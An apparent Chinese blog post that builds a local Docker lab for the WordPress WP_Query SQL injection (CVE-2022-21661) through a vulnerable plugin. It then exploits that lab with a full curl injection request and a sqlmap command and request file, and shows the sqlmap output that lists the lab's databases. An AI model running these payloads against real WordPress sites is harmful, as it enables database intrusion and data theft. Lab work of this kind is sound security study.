docker WellingtonEspindula/SSI-CVE-2022-21661 sqlmap+json一键梭哈

qq_290606272024-10-29 20:42
cd /tmp;
git clone https://github.com/WellingtonEspindula/SSI-CVE-2022-21661/
apt  install -y docker-compose  &
docker pull mysql:5.7 ;docker pull  wordpress:5.8.1 ; docker pull  wordpress:cli;


root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661# dpkg -l | grep docker-compose
ii  docker-compose                       1.29.2-1                                all          define and run multi-container Docker applications with YAML
root@ip-10-0-13-26:/tmp/SSI-CVE-2022-21661#

自定义docker-compose.yml ,自己修改后的就叫:Gdocker-compose.yml

version: "3.3"
services:
  db:
    image: mysql:5.7
    volumes:
      - db_data:/var/lib/mysql
    ports:
      - 33060:3306
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    healthcheck:
      test: mysqladmin ping -h 127.0.0.1 -u $MYSQL_USER --password=$MYSQL_PASSWORD
      start_period: 5s
      interval: 5s
      timeout: 5s
      retries: 55

  wordpress:
    depends_on:
      db:
        condition: service_healthy
    image: wordpress:5.8.1
    ports:
      - 8000:80
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_TABLE_PREFIX: "wp_"
      WORDPRESS_DEBUG: 1
    volumes:
      - wp_data:/var/www/html

  wordpress-cli:
    depends_on:
      - db
      - wordpress
    image: wordpress:cli
    user: root
    stdin_open: true 
    tty: true
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_NAME: wordpress
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
    command: >
      /bin/sh -c '
      id;
      cat /etc/hosts;
      ip add;
      sleep 3;
      wp --allow-root core install --url="http://127.0.0.1:8000" --title="CVE2022-21661" --admin_user=admin --admin_password=admin --admin_email=foo@bar.com;
      wp --allow-root plugin install elementor  --version=3.5.0  --activate;
      wp --allow-root plugin install ele-custom-skin --version=3.1.3 --activate;
      wp --allow-root theme install hello-elementor --version=2.5.0 --activate;
      wp --allow-root user create tom tom@tom.com          --user_pass="weakpassword";
      wp --allow-root user create leo leo@leo.com          --user_pass="strongpassword";
      wp --allow-root user create bassam bassam@bassam.com --user_pass="pinto99";
      chown -R 33:33 /var/www/html;
      chmod -R 0777 /var/www/html;
      cat /etc/passwd;
      wp config set WP_DEBUG true --raw --allow-root;
      wp config set WP_DEBUG_LOG true --raw --allow-root;
      wp config set WP_DEBUG_LOG "/var/www/html/aab.log" --allow-root;
      wp config set WP_DEBUG_DISPLAY true --raw --allow-root;
      bash;
      '
    volumes:
      - wp_data:/var/www/html

volumes:
  db_data:
  wp_data:

wp --allow-root plugin install elementor --version=3.6.2 --activate;

这个3.6.2版本也是可以的,况且存在这个漏洞,可以一起测试

#https://www.exploit-db.com/exploits/50882

#WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)

启动3个docker:

docker-compose -f /tmp/SSI-CVE-2022-21661/Gdocker-compose.yml  up -d

查看日志:

docker logs -f ssi-cve-2022-21661_wordpress-cli_1 ;

mysql容器连接测试:

docker exec -it  ssi-cve-2022-21661_db_1  bash

mysql  -h 127.0.0.1 -u wordpress --password=wordpress -e "select now();"

使用curl进行sql注入测试(参考SSI-CVE-2022-21661/example.md at master · WellingtonEspindula/SSI-CVE-2022-21661 · GitHub):

curl -x http://127.0.0.1:8080/  -i --compressed -k -X $'POST' \
    -H $'Host: 127.0.0.1:8000' -H $'User-Agent: python-requests/2.28.1' -H $'Accept-Encoding: gzip, deflate, br' -H $'Accept: */*' -H $'Connection: keep-alive' -H $'Content-Length: 287' -H $'Content-Type: application/x-www-form-urlencoded' \
    --data-binary $'action=ecsload&query=%7b%22tax_query%22%3a%7b%220%22%3a%7b%22field%22%3a%22term_taxonomy_id%22%2c%22terms%22%3a%5b%22%22%5d%7d%7d%7d&ecs_ajax_settings=%7b%22post_id%22%3a%221%22%2c%20%22current_page%22%3a1%2c%20%22widget_id%22%3a1%2c%20%22theme_id%22%3a1%2c%20%22max_num_pages%22%3a10%7d' \
    $'http://127.0.0.1:8000/wp-admin/admin-ajax.php'

http://127.0.0.1:8080/ 是burpsuite 2022起的http代理,方便观察.

祭出大杀器sqlmap:

set cmdpath2024=c:\Python310\python

%cmdpath2024% E:\BaiduNetdiskDownload\sqlmapproject-sqlmap-796173f\sqlmap.py -vvv -r  ./rr2024.txt   --dbms=mysql --technique=E  --prefix="23)  " --suffix="#" --threads=4  --current-db --is-dba --dbs  --proxy=http://127.0.0.1:8080

# sqlmap 1.5.7.7#dev   ,  支持python3.10

rr2024.txt如下:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: curl/7.87.0
Accept: */*
Content-Length: 131
Content-Type: application/x-www-form-urlencoded
Connection: close

action=ecsload&query={"tax_query":{"0":{"field":"term_taxonomy_id","terms":["1*"]}}}&ecs_ajax_settings={"post_id":"1", "current_page":1, "widget_id":1, "theme_id":1, "max_num_pages":10}

得到结果:

web server operating system: Linux Debian
web application technology: PHP 7.4.25, Apache 2.4.51
back-end DBMS: MySQL >= 5.1
[18:49:47] [INFO] fetching current database
[18:49:49] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[18:49:49] [INFO] testing if current user is DBA
[18:49:49] [INFO] fetching current user
[18:49:51] [INFO] retrieved: 'wordpress@%'
current user is DBA: False
[18:49:52] [INFO] fetching database names
[18:49:56] [INFO] retrieved: 'information_schema'
[18:49:56] [INFO] retrieved: 'wordpress'
[18:49:56] [DEBUG] performed 3 queries in 3.61 seconds
available databases [2]:
[*] information_schema
[*] wordpress

其它辅助参考资料:

https://github.com/daniel616/CVE-2022-21661-Demo


#wp --allow-root theme install https://downloads.wordpress.org/theme/hello-elementor.3.1.1.zip --activate

#wp --allow-root theme install /path/to/hello-elementor.3.1.1.zip --activate


#https://raw.githubusercontent.com/elementor/elementor/main/changelog.txt
# curl https://api.wordpress.org/plugins/info/1.0/elementor.json

#https://downloads.wordpress.org/plugin/elementor.3.25.1.zip
#https://downloads.wordpress.org/plugin/elementor.3.6.2.zip
#https://downloads.wordpress.org/plugin/elementor.3.11.0.zip


cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.1.0.zip
cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.5.0.zip
cd /tmp&&curl -vk4O  https://downloads.wordpress.org/theme/hello-elementor.2.7.0.zip




https://forum.butian.net/share/1324
漏洞简介
这是最近爆出来的一个 wordpress 的 SQL注入漏洞,实际上不是一个可以直接利用的洞,而是wordpress的一个核心函数 WP_Query的漏洞,这个函数常被插件使用,因此能造成的危害也挺大,前台后台都有可能。
相关推荐
罗狮粉 9910 分钟前
docker部署微信小程序自动构建发布和更新
docker·微信小程序·notepad++
愿得一人欣12 分钟前
工具大全-dirsearch探测Web目录
网络安全·ctf比赛工具·渗透工具大全
旺仔学IT12 分钟前
CentOS上安装和卸载Docker
docker·centos
ZHOUPUYU13 分钟前
Centos常用命令,按功能分类,用户和权限管理等
linux·运维·centos
vvw&31 分钟前
如何在 Ubuntu 22.04 上安装 phpMyAdmin
linux·运维·服务器·mysql·ubuntu·php·phpmyadmin
D1TAsec43 分钟前
编译型语言的痛!但无文件落地我可以!!!
网络安全
前端_库日天1 小时前
部署自己的git托管平台
git·ubuntu·docker
灰勒塔德1 小时前
Linux文件IO
linux·运维·服务器
西西弗Sisyphus2 小时前
RAGFlow 基于深度文档理解构建的开源 RAG引擎 - 在 Ubuntu 上安装 Docker Engine
docker·大模型·rag
dntktop2 小时前
解锁自动化新高度,zTasker v2.0全方位提升效率
运维·windows
热门推荐
0119个Web前端交互式3D JavaScript框架和库02ARM学习(31)编译器对overlay方式的支持03玄机平台应急响应—webshell查杀04RAG 实践- Ollama+RagFlow 部署本地知识库05【一文读懂】NTN(非地面网络)技术介绍06(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明07ZZ038 物联网应用与服务赛题第J套08组基轨迹建模 GBTM的介绍与实现(Stata 或 R)09Docker 夺命连环 15 问10VSCode插件 —— Cody AI (免费AI助手!)